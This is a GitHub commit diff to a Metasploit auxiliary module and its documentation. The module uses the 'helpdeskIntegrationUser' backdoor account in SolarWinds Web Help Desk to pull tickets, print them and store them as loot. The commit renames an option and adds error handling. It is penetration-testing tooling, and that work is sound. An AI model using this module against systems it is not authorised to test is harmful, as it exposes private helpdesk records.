Skip to content

Commit d950bf7

Browse files
h4x-x0rh4x-x0r
committed
updated
updated
1 parent 6c3e933 commit d950bf7

File tree

2 files changed

+8
-7
lines changed

2 files changed

+8
-7
lines changed

documentation/modules/auxiliary/gather/solarwinds_webhelpdesk_backdoor.md

Lines changed: 1 addition & 1 deletion
Original file line numberDiff line numberDiff line change
@@ -29,7 +29,7 @@ This should return all the tickets from the Web Help Desk platform.
2929

3030
## Options
3131

32-
### TICKETSTODUMP
32+
### TICKET_COUNT
3333
The number of tickets to dump to the terminal.
3434

3535
## Scenarios

modules/auxiliary/gather/solarwinds_webhelpdesk_backdoor.rb

Lines changed: 7 additions & 6 deletions
Original file line numberDiff line numberDiff line change
@@ -40,13 +40,14 @@ def initialize(info = {})
4040
register_options(
4141
[
4242
OptString.new('TARGETURI', [true, 'The base path for Web Help Desk', '/']),
43-
OptInt.new('TICKETSTODUMP', [false, 'The number of tickets to dump', 10])
43+
OptInt.new('TICKET_COUNT', [false, 'The number of tickets to dump', 10])
4444
]
4545
)
4646
end
4747

4848
def check
4949
@auth = auth
50+
return Exploit::CheckCode::Unknown('Target is unreachable') unless @auth
5051

5152
if @auth.code == 401
5253
return Exploit::CheckCode::Safe
@@ -71,9 +72,10 @@ def auth
7172
def run
7273
print_status('Authenticating with the backdoor account "helpdeskIntegrationUser"...')
7374
@auth ||= auth
75+
fail_with(Failure::Unknown, 'Target is unreachable') unless @auth
7476

75-
body = @auth.body
76-
fail_with(Failure::UnexpectedReply, 'Unexpected Reply: ' + @auth.to_s) unless body.include?('shortSubject')
77+
jbody = @auth.get_json_document
78+
fail_with(Failure::UnexpectedReply, 'Unexpected Reply: ' + @auth.to_s) unless jbody.any? { |item| item.is_a?(Hash) && item.key?('shortSubject') }
7779

7880
report_service(
7981
host: rhost,
@@ -82,9 +84,8 @@ def run
8284
name: 'SolarWinds Web Help Desk'
8385
)
8486

85-
jbody = JSON.parse(body)
86-
print_good("Successfully authenticated and tickets retrieved. Displaying the first #{datastore['TICKETSTODUMP']} tickets retrieved:")
87-
tickets_to_display = jbody.first(datastore['TICKETSTODUMP'])
87+
print_good("Successfully authenticated and tickets retrieved. Displaying the first #{datastore['TICKET_COUNT']} tickets retrieved:")
88+
tickets_to_display = jbody.first(datastore['TICKET_COUNT'])
8889
print_good(JSON.pretty_generate(tickets_to_display))
8990

9091
file = store_loot('solarwinds_webhelpdesk.json', 'text/json', datastore['USER'], jbody)

0 commit comments

Comments
 (0)